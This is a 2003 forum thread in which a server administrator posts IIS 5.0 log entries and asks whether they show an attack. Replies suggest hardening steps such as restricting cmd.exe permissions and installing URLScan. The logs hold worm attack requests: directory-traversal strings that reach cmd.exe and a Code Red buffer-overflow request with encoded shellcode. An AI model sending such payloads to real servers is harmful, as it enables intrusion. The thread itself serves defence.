Link to home
Start Free TrialLog in
Avatar of nonsence
nonsence

asked on

IIS 5.0 log files produce odd url requests

i'm almost sure this is either a virus like Code Red or Nimda, but i also think it's intentionally done. i believe someone is trying to find an expoit for my web server which is Windows 2000 Advanced Server with Service Pack 3 and IIS 5.0
below is a brief look at the log file that the connection scanning me has made. i'm just interested if someone can tell me if i'm right, and also how to prevent against future attacks, etc.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-16 00:27:37
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 00:27:37 24.76.172.162 - 22.22.22.22 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:38 24.76.172.162 - 22.22.22.22 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:39 24.76.172.162 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:40 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:27:42 24.76.172.162 - 22.22.22.22 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:42:16 202.100.108.18 - 22.22.22.22 80 GET / - 400 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.22 80 GET /scripts/root.exe /c+dir 404 -
2003-03-16 00:42:58 24.198.93.214 - 22.22.22.224 80 GET /MSADC/root.exe /c+dir 404 -
2003-03-16 00:42:59 24.198.93.214 - 22.22.22.22 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:01 24.198.93.214 - 22.22.22.22 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:01 24.198.93.214 - 22.22.22.224 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:02 24.198.93.214 - 22.22.22.22 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:02 24.198.93.214 - 22.22.22.22 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:04 24.198.93.214 - 22.22.22.22 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2003-03-16 00:43:04 24.198.93.214 - 22.22.22.22 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:05 24.198.93.214 - 22.22.22.22 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:08 24.198.93.214 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 00:43:08 24.198.93.214 - 22.22.22.22 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2003-03-16 01:07:00 24.42.100.192 - 22.22.22.22 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

for security reasons i changed my ip to 22.22.22.22
ok well, of anyone can give me some more insight into this, a link to a web site, a tutorial on iis logging and how to determine hacker attacks would be great too. thanks
ASKER CERTIFIED SOLUTION
Avatar of PaulBobby
PaulBobby
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of blakogre
blakogre
Flag of United States of America image
Here's a tip:  many of these attacks, and future attacks, revolve around privilege escalation: the attacker's code runs under the powerful SYSTEM account.  Notice how the code is going after cmd.exe?

Apply NTFS permissions to CMD.exe denying the SYSTEM account access to that file.  They'll be prevented from executing the code, and any future code will be stymied as well, assuming it uses privilege escalation.

Keep in mind: this will not cause issues with scripts.  It WILL prevent win2k "File System Protection" from being able to update the file.  To me, a minor tradeoff.  
Avatar of sKuLLsHoT
sKuLLsHoT
i would install URLscan filter from microsoft onto your server, it will catch malicious requests such as this and log them separately, also look at microsofts IISLockD tool, although its microsoft, these 2 utilities can go a long way to makin the IIS very secure

one final thing to look at is Microsoft Baseline Security advisor - it gets all the hotfix's and security patches you need for the system.

all these can be found on microsofts IIS website but using google to find the tools is probably much easier.
Avatar of nonsence
nonsence

ASKER

i know about urlscan and iislockd. i also use secureiis and severmask as two 3rd party tools. anyone know any others?

this isn't by chance something smart enough that can log such activity and then block incoming access from the attacking ip address for lets say a few hours do a day is there?